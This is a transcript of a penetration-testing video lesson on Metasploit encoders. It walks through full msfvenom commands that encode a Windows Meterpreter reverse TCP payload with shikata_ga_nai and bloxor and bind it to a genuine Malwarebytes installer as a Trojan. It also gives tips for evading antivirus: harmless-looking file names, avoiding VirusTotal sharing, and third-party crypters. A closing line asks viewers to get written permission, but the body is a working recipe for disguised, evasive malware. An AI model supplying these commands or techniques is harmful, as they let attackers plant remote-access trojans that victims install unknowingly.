Welcome to part six of this module. Last video we saw how to generate a payload in Metasploit using msfvenom. We did this as part of an imaginary scenario where our opponent, the network administrator, was a not-so-sapient chimpanzee. In other words, our target had no antivirus or defenses of any kind. And while it is true that a shockingly high number of targets out there that you might be called upon to penetration test have lax security or even no security at all, we really can't proceed under the assumption that this will always be true. If you recall, we uploaded the payload we created to VirusTotal and it was immediately detected by every antivirus software out there as being a malicious piece of code. This is obviously unacceptable.

So now it is time to start learning about encoders. Briefly put, we use encoders to encode payloads and obfuscate what they are. The idea is that antivirus software is set up to recognize certain strings within code, and encoders switch these around so that they look different but still do the same thing, thus evading detection. Granted, what I just said is a gross oversimplification of a very complex and multilayered science, but I hope it's enough to give you the general idea. In a perfect world we would all be coding geniuses and could do this in a unique way ourselves.
However, very few of us have the time or inclination to figure out how to encode by hand. Hence why Metasploit comes preloaded with a wide selection of encoders for use, built right into the framework itself. A few years ago encoders were almost bulletproof. Unfortunately, as Kali and Metasploit have grown in popularity among penetration testers and hackers alike, more and more antivirus companies have begun to study the unique ways each individual encoder works and then put out updates to detect encoded payloads. We get around this with a variety of tricks, such as using additional iterations in the encoding process or even multiple different encoders. The antivirus companies counter with additional updates, and so continues the game of cat and mouse between attackers and defenders.

For that reason you aren't going to see a method in this video to create a completely undetectable payload. Even if such a method existed, it would be obsolete soon enough. As a wise man once said, you can fool some of the people some of the time, but you can't fool all the people all of the time. Fortunately for us, we really don't need to fool every single antivirus software out there. We only need to concentrate on the ones we are most likely to come up against, in particular Windows Defender and Malwarebytes.
This is also where reconnaissance of your target comes into play. Most systems have one antivirus and maybe Malwarebytes. If you know what the specific defenses are and you can fool them, that's really good enough.

So we're going to start out by loading the msfconsole. If you need a refresher on how to do this, we just type service postgresql start and then msfconsole. Now obviously I've already done this because that tends to take quite some time. We'll start off by typing msfvenom --help to see the optional switches that we'll be using. Now we're going to do exactly what we did in the last video, only this time we're going to employ evasion techniques to try to get our payload around antivirus. The encoders included with Metasploit are not the only or even necessarily the best method of doing this, by the way, and at the end of the video I'll speak a bit more about other options.

Let's go over these switches really quick. -p is used to specify the payload; we'll also be using a second dash for a custom payload. We'll see this in the second example. -f is going to be the output format for our payload, such as, for example, exe, bin or raw. -e is very important: that is used to specify the encoder and is the crux of this tutorial. -s isn't as important, but I want to mention it even though I'm getting a little ahead of myself.
We won't be using this switch; however, you could use it to set a limit on the maximum size of the payload. This is useful because the more iterations you tell the encoder to use, the bigger the payload is going to be. This is generally the difference of maybe a few hundred bytes. However, there may be circumstances where you need to keep the file size perfectly consistent. That is what this switch is used for.

-i stands for iterations; as the description says, this is the number of times the encoder will encode the payload. In theory the more times the better; in practice, if a payload is being detected after about 10 to 30 iterations, then it's time to consider using either a different payload or a different encoder or a different set of encoders. You can perform thousands of iterations if you want to, but after a certain point it either works or it doesn't, and overkill won't really change that.

-k is used to preserve the template behaviour and inject the payload as a new thread. All this really means is that when we combine our payload with some other file to create a Trojan horse, that other file will behave normally when executed; the payload simply gets attached to the end of that file and run in sequence. This isn't always a good thing, and it can make the malicious code easier to detect.
But figuring out how to wedge a payload in the middle of another file and have that file perform normally is outside of the scope of this tutorial. And honestly it doesn't really make that much of a difference to the detection rate.

-x is template, which is used to specify a custom executable file to append to our payload, or rather to append our payload to. In reality it doesn't really change the file itself. It creates a new copy of the file with the payload attached to it.

-c isn't something we will be using in this video either, but this is a really advanced switch that you can and should study if you really want to get into payload generation. This allows you to append additional code to the payload itself so that the code is executed along with the payload. Again, really advanced stuff, but it is possible to do things like disable certain defenses or extract information at the time that the payload is actually run, and it might even be possible to create a Windows task that loads the payload at certain times of the day, thus granting you access again in the future when using the same method.

All right. That was quite an info dump. Now let's look at the encoders that we'll be using.
Keep in mind that your list may look different depending on when you watch this video, as new encoders are being released and old ones that become obsolete are, at least in theory, being removed from the framework between updates. So to bring up the list we're gonna do msfvenom -l encoders: -l for list, then encoders. It'll take a few seconds for the framework to enumerate all of them. Remember that this list is just the ones that come prepackaged with Kali; other encoders do exist and can be downloaded and added to the framework, which is modular. In fact you might be able to find better or less widely known options if you search online that have a better success rate because they are less mainstream and so the antivirus companies are less familiar with them.

In any event, here we have a list of all the encoders. To start us off, we're going to use the polymorphic additive feedback encoder, shikata_ga_nai, and I hope I'm pronouncing that correctly. This encoder is ranked Excellent, which means it has been found to have a very good success rate in the past. Shikata ga nai, as I understand it, in Japanese means unbeatable. Sadly it is far from unbeatable, but it is going to be our starting point. This is a 32-bit encoder, so it will work best with 32-bit exe files. Now, I mentioned that this is a polymorphic encoder.
What does that mean exactly? Well, essentially a polymorphic encoder changes the encoding signature automatically and keeps changing it to make the payload harder to detect.

We'll be needing our own IP address on our network. Just like last time, to get this we do ifconfig. And we can see it under inet right here. Remember that yours will vary depending on your network setup. Once the IP is in hand, we'll use it to set the LHOST. Just like in the last video, I'm just going to type out the command and then I'll go through this step by step. So it's going to be msfvenom -p windows/meterpreter/reverse_tcp, forgive my typing, LHOST= our IP address, which in my case is going to be 10.0.0.225. We're going to set the LPORT and, just like last time, we're going to go with 4444, then -k, then -e, and we'll specify x86/shikata_ga_nai, -i 250, -f exe, greater-than sign, /root/Desktop/, and then we give the name of the payload. In this case I'm just going to call it encoded payload.exe.

Now, like I said, this is basically the same command that you saw in the last video. We're generating a Windows Meterpreter reverse TCP payload: msfvenom, then -p for payload, and we specify windows/meterpreter/reverse_tcp, although we could specify any payload that we wish to use, and there are a lot of them. For the LHOST we again use our own network IP address, and yours will be different. For this demonstration I'm keeping 4444 for the LPORT just to make things simple and straightforward, but you might consider using a different port; that isn't really something we need to worry about right now. And -e is used to specify our encoder, and once again that is shikata_ga_nai, which is a 32-bit or x86 encoder that is highly rated. The -i is for iterations, or the number of times that you want to encode. According to most documentation I've read, ten is really the recommended value, but such recommendations are more than a year old and most antivirus software has come a long way since then. So for that reason I've completely arbitrarily picked two hundred and fifty. It will take slightly longer of course, and the more iterations you select, the larger the payload file will be.
So keep this in mind; you can get away with 10 if you think two hundred and fifty is overkill. Then we select -f for the format that we want and specify exe for an exe file. Last, we use the greater-than sign to specify the output file, which we want on our desktop just to keep things straightforward. You'd probably want to give the file an innocuous-sounding name, but for just right now I'm going to call it something easy to understand like encoded payload.exe. But remember, whatever you call it may show up in Task Manager, so you probably do want to give this a name that won't be noticed.

In any case, we press enter and this encodes our payload using shikata_ga_nai. Once encoded, the payload should only be detected by about maybe 50 to 60 percent of the antiviruses out there instead of 100 percent. But keep in mind this is just one way, the easiest way, of doing this; there are additional steps that we can take to improve our ability to evade detection. The important thing is that this method should allow you to evade Windows Defender, at least to a certain extent, and it has a reasonable chance of slipping past Malwarebytes. I'm not at all trying to suggest that a 40 to 50 percent evasion rate is in any way great or something you should aspire to, but it is at least a starting point.
If we look at our desktop we can see that the file was in fact created. Now, in the last video you saw me upload an unencoded payload to VirusTotal to show off how easy it was for such a thing to be detected. You can upload your newly encoded payload if you want to, if all you want to do is see how each new method improves upon your antivirus evasion rate; however, I don't recommend this unless you manage to create a payload that is 100 percent undetectable. You need to remember that antivirus companies tend to share their data. If even one of those antivirus scanners detects a virus, the hash data and the other information will be shared across the board and your payload will be obsolete within an update or two. A better strategy would be to create a contained virtual environment with a number of updated scanners, like a Windows VirtualBox, and see if your payload is able to infect it without being detected and blocked.

At any rate, even at 50 percent, those are pretty bad odds. Shikata ga nai was a good starting point, but we need to take further steps if we want to have the best possible chance of success. Now it's time to add a second encoder into the mix, and we will go so far as to attach our malicious code to a file that looks safe.
So once again we'll bring up the list of encoders. We've used a polymorphic encoder already, so let's choose another one. Using two encoders will give us a better chance that our payload will be able to evade detection. To this end, let's select the bloxor metamorphic encoder. This is block based, and it will allow us to encode a raw file into an exe file template.

Since we are starting fresh, I'm going to delete the old payload. We now need to export this as a bin file in raw format; that is the only format that you can use in this case. It's going to look like this: msfvenom -p windows/meterpreter/reverse_tcp. We'll set the LHOST; once again it'll be the same network IP, and we'll continue using 4444 for the LPORT. Doesn't really matter. -e, and we will once again select x86/shikata_ga_nai, then -i for the number of iterations, which again is up to you. 10 is recommended. I'm using 250 just because I feel like overkill. -f for the format, and this time we're going to specify it raw instead of exe, then the greater-than sign for our output, which is going to be /root/Desktop/, and I'll just call it encoded payload.bin. Uh oh, oops, if we type Desktop correctly. What we're doing here is essentially outputting the payload into a raw file.
It's the same one, so windows/meterpreter/reverse_tcp. We're keeping all of our old settings the same, and we specified the shikata_ga_nai encoder, and this is our first round, so to speak. And this should encode fairly quickly. In this case we did not need to select an architecture, and that is because we're going to be using a template, which again in this case is going to be an exe file, but any exe file will work for this. So you'd want it to be something that someone is likely to click on. It's basically a Trojan horse, don't forget. For this demonstration, actually I'll pull it up, for this demonstration I've selected the Malwarebytes community edition installer, because irony. If your target is a 64-bit operating system, or the file that you're attaching to is exclusively 64-bit, then you can specify 64-bit architecture in the next step.

Now comes the complicated bit, right? So I've gone ahead and cleared the screen and we'll walk through this rather long bit of code real quick. msfvenom -p for payload; we give it an extra space and an extra dash, then -x for the exe file we want to use as our template. Again, this is the Malwarebytes installer in this instance. Then -k, which means we don't want to make any changes to the Malwarebytes installer.
We just want to slap our malicious code right onto the end of it. -f exe says we want to create an exe file as our final product. -a is where you specify the architecture; I'm using x86 for 32-bit, but you could use x64. We do --platform and specify windows. This is very important. -e for the encoder we want to use, and then we give it x86/bloxor. -i for the number of iterations, and I'll just go with 10 for this instance. And then we give it a greater-than sign and specify that we want our final product to be created on the desktop. We would also probably want to name our file Malwarebytes installer or something similar, but I'm just going to call it final product for this video. Then we use the less-than sign and specify the path to the raw payload that we just created with shikata_ga_nai.

This is now taking the raw payload that we encoded with shikata_ga_nai, further encoding it with bloxor, then creating a new exe file that is going to be our Malwarebytes installer with our payload attached to the end. In this case it's going to be named final product.exe. So when someone double-clicks on this new installer, Malwarebytes will install and our payload will activate right along with it.
Well, that's the idea anyway. Using the polymorphic in conjunction with the metamorphic increases our evasion chances significantly, and that was also a really fun sentence to say out loud. Now it's going through the iterations as we specified; it should be finished in just a moment. And there we go. And note the final payload size is related to the exe file that we used as a template as well as the number of iterations. And here's our final product. Notice that the Malwarebytes installer is still here. So we would want to name this something like Malwarebytes installer or whatever. Now, if someone were to click on this, Malwarebytes would install and our payload would install right along with it.

But that's not the last word on evasion, not by a long shot. The dance between hackers creating payloads of all sorts and antivirus companies is ongoing. There are many, many techniques that you can discover and employ, several of them beyond the scope of this tutorial. This is a very deep well to dive into, and remember also that the encoders that come with Metasploit are not the only ones out there. In fact you might have better luck if you find a few less well-known encoders online and add them to the Metasploit framework.
If they're less well known, it is less likely antivirus companies have their methods in their virus definitions. So that will be about it for the subject of encoders. Remember you can try various combinations using the method shown here. You need to get creative and really work at it, though, if you plan to go this route.

It is also an entirely different subject unto itself, but I would be remiss if I did not point out that encryption is also an option where payloads are concerned. There are many programs out there called crypters which, in terms of what they do, are very much like encoders, but some of them have very high success rates. Actually, most serious hackers do not rely on the encoders that are built into Metasploit but either design their own or pay real money to download crypters from professional creators. I'll touch on this subject a bit more in the modules on encryption, and we'll talk about it again when we go over botnets. But just for right now, note that there are still several alternatives out there if you find that the encoders are not satisfactory. I will not be recommending any third-party encoder or crypter in these videos, however, so you must do your own due diligence and find such things on your own if this is something that interests you.

All right then, that pretty much covers the basics of encoders. As always, never use anything demonstrated in these videos against any target that you do not have written permission from the owner to penetration test. Abide by the law at all times. Thank you for your attention, and we'll pick up in the next video.